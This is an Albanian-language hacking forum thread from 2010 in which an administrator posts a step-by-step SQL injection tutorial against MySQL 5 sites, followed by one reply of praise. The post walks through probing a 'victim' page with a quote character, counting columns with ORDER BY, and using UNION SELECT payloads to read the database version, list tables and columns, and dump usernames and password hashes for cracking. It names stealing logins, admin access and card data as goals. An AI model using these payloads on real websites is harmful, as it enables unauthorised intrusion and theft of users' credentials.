SQL-Injection

    Share
    avatar
    ak47***
    Administrator
    Administrator

    Male Age : 23
    Poenat : 806
    Reputacioni : 6
    Vendndodhja : AHT-Crews
    Numri i postimeve : 300

    SQL-Injection

    Mesazh nga ak47*** prej Mon Feb 01, 2010 1:30 pm

    -------------------------------------------
    1.SQL-injetion-Tutorial për Versionin 5.x.x
    ----------------------------------------------------
    1.1 Cka është SQL-injetion?
    1.2 Provo faqen për vulnerability!
    1.3 Si të zbulojmë sa numra të kolumnave egzistojnë?
    1.4 Provo për UNION SELECT funksionin!
    1.5 Si të zbulojmë verzionin e MYSQL-së?
    1.6 Si të zbulojmë Table_name?
    1.7 Si të zbulojmë Column_name?
    1.8 Përfundim?

    ============================
    1.1 Cka është SQL-injetion?
    ============================
    SQL-injetion është një ndër metodat më të përdorura ditët e sodit për të marrë akses në ndonjë webfaqe.
    Kjo metodë i jep leje sulmuesit që të sulmon përmes URL-së.
    Me këtë metodë sulmuesi ka mundësi të marrë informata të ndryshme nga MYSQL-së,(username,passwords), logins të ndryshëm,
    akses nëpër faqe të administrimit, CC etj...

    ====================================
    1.2 Provo faqen për vulnerability!!
    ====================================
    Të themi se kemi dicka të till:
    ----------------------------------
    [You must be registered and logged in to see this link.][/url]
    ----------------------------------

    Tani që të testojm se a është faqa vulnerability, apo thjesht ka buggs shkojmë dhe ja shtojmë ' pra presjen lart, e cila
    do të duket kështu:
    -----------------------------------
    [You must be registered and logged in to see this link.]
    -----------------------------------
    Pra pas këtij veprimi, nëse na jepë ndonjë error si prsh:
    ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++
    "You have an error in your SQL syntax;" ose "Warning: mysql_result() [function.mysql-result]:"
    ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++
    Me këtë nënkuptohet se faqja është vulnerability, pra ka lëshime!

    ================================================== ===
    1.3 Si të zbulojmë sa numra të kolumnave egzistojnë?
    ================================================== ===
    Për të gjetur sa Kolumna kemi, përdorim: ORDER BY
    Pra (order by) do të na ndihmon të gjejmë sa kolumna kemi në faqen e viktimës, shkojmë në shëmbull:
    ----------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] order by 1-- <--> Hapet faqja normal pra nuk na jep Error
    ----------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] order by 2-- <--> Hapet faqja normal pra nuk na jep Error
    ----------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] order by 3-- <--> Hapet faqja normal pra nuk na jep Error
    ----------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] order by 4-- <--> Hapet faqja normal pra nuk na jep Error
    ----------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] order by 5-- <--> Error page - Pra këtu kemi Error
    ----------------------------------------------------------------------------------------------------
    Me këtë nënkuptojmë se tek kjo faqe kemi 4 Kolumna, pra e heqim (5) numrin e fundit i cili jep error!
    e lejmë kështu: [You must be registered and logged in to see this link.][/url] order by 4--

    =======================================
    1.4 Provo për UNION SELECT funksionin!
    =======================================
    Pra tani do të provojmë që të nxjerim numrat e kolumnave dhe të dhënat të tjera në dritare, përmes (Union select).
    Nëse kemi 4 numra të kolumnave në shembull, do të dukej dicka e tillë:
    ---------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,3,4--
    ---------------------------------------------------------
    Nëse në faqe na shfaqet ndonjëri prej numrave prej 1-4 atëherë është mirë funksionon gjithçka në rregull por në qoft se jo
    atëhere provoni të ja shtoni nji - (minus) përpara tek (1)
    shembull:
    ----------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,3,4--
    ----------------------------------------------------------
    Tani duhet të shfaqet ndonjëri prej 4 numrave prej 1-4.
    Nëse shfaqet ndonjëri prej këtyre numrave atëhere gjithcka është në rregull!

    =========================================
    1.5 Si të zbulojmë verzionin e MYSQL-së?
    =========================================
    Si të zbulojmë verzionin e mysql-së është lehtë, këte mundemi të bëjmë duke zevendesuar numrin e kolumnës me këtë (@@version).
    Më pas duhet të na shfaqet se cfarë verzioni është prezent në faqen e viktimës.
    Të themi se numri i cili shfaqet është (3) për të treguar më qart do ju tregoj me shëmbullin më poshtë:
    ------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,@@version,4--
    ------------------------------------------------------------------
    Dhe tani do të na shfaqet versioni.

    ===============================
    1.6 Si të zbulojmë Table_name?
    ===============================

    ----------------------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
    ----------------------------------------------------------------------------------------------------------------------------------------------
    Dhe Tani do të na shfaqet emri tabelës prsh: (users).

    ================================
    1.7 Si të zbulojmë Column_name?
    ================================
    E njëjta gjë vlen edhe per gjetjen e kolumnave(column_name) sikur tek table_name!
    Në vënd ku shkruan
    (table_name) & tables duhet vendosur (column_name) & columns.
    Shkojmë të shfaqim edhe këtë shëmbull:
    ------------------------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
    ------------------------------------------------------------------------------------------------------------------------------------------------
    Të themi që column_name janë (username, password).
    Ja kështu duhet vepruar që të na shfaqet (Username, Passwordi ose Hashi):
    ---------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(username,0x3a,password,),4 from users--
    ---------------------------------------------------------------------------------------------------------
    Dhe tani na shfaqen (Username, Passwordi ose Hashi)
    nëse del (hashi) këtu mundë ta Crackoni:
    -----------------------------------
    [You must be registered and logged in to see this link.][/url]
    -----------------------------------

    ===============
    1.8 Përfundim?
    ===============
    Si përfundim do ti postoj të gjitha linqet në një vënd që ta keni më të lehtë për tu bazuar!
    ------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url]
    ------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.]
    ------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] order by 1-- <--> Hapet faqja normal pra nuk na jep Error
    ------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] order by 2-- <--> Hapet faqja normal pra nuk na jep Error
    ------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] order by 3-- <--> Hapet faqja normal pra nuk na jep Error
    ------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] order by 4-- <--> Hapet faqja normal pra nuk na jep Error
    ------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,3,4--
    ------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,3,4--
    ------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,@@version,4--
    ----------------------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
    ------------------------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
    ------------------------------------------------------------------------------------------------------------------------------------------------
    [You must be registered and logged in to see this link.][/url] union select 1,2,group_concat(username,0x3a,password,),4 from users--


    __________________________________________________________________________________________________________
    [You must be registered and logged in to see this image.]
    avatar
    h0Ax b00ter
    Administrator
    Administrator

    Male Age : 22
    Poenat : 498
    Reputacioni : 0
    Vendndodhja : @ AHT
    Numri i postimeve : 249

    Re: SQL-Injection

    Mesazh nga h0Ax b00ter prej Mon Feb 01, 2010 3:15 pm

    Shum mir e ki spjegu...BraVo

      Ora është Fri May 25, 2018 3:31 pm